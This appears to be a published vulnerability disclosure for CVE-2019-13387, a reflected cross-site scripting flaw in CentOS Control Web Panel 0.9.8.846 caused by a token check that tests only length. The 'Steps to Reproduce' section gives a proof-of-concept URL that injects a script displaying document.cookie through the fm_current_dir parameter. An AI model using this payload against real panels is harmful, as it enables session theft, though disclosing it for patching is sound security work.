Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Information

Exploit Title       : CWP (CentOS Control Web Panel) Reflected Cross Site Scripting
Date                : 7 July 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.846
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-13387

Description

CWP Version 0.9.8.846 have implemented token in every URL to prevent cross site scripting. But the aplication checks only length of the token, this allows attacker to follow the token format to bypass XSS protection Refer to : CVE-2018-18324


Steps to Reproduce

Example :

https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxx/user1/fileManager2.php?frame=3&fm_current_dir=</script><script>alert(document.cookie)</script>

Parameter Name : fm_current_dir
Attack Pattern for XSS : </script><script>alert(document.cookie)</script>



Timeline

2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vender accepted the vulnerability
2019-07-15: The vulnerability has been fixed
2019-07-23: Published